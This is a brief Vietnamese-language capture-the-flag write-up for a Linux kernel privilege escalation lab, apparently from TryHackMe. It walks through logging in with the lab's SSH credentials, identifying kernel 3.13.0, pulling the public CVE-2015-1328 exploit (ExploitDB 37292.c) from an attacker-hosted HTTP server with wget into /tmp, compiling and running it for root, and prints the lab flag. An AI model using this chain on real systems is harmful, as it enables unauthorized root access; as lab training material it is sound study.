Description
Linux Privilege Escalation - Kernel Exploits
Leo thang đặc quyền bằng lỗ hổng của kernel và đọc flag ở trong
/home/matt/flag1.txt.
Approach
Đầu tiên ta kết nối đến target machine thông qua SSH với username là karen và password là Password1.
Sau đó kiểm tra version của kernel:
cat /proc/versionNhận thấy kernel có phiên bản 3.13.0, tìm kiếm trên ExploitDB thì ta thu được một lỗ hổng có CVE là CVE-2015-1328.
Ta tải exploit (tập tin có tên là 37292.c) về và host một http server ở thư mục chứa exploit đó:
python3 -m http.server 8000Ở bên target machine, ta tải exploit về vào thư mục /tmp:
cd /tmp
wget http://IP:8000/37292.cBiên dịch exploit:
gcc 37292.c -o 37292Kiểm tra quyền và nhóm của người dùng hiện tại:
idChạy exploit:
./37292Chạy lệnh id lần nữa sẽ thấy ta đã có quyền root.
Đọc tập tin /home/matt/flag1.txt và ta có được flag.
Flag
Success
THM-28392872729920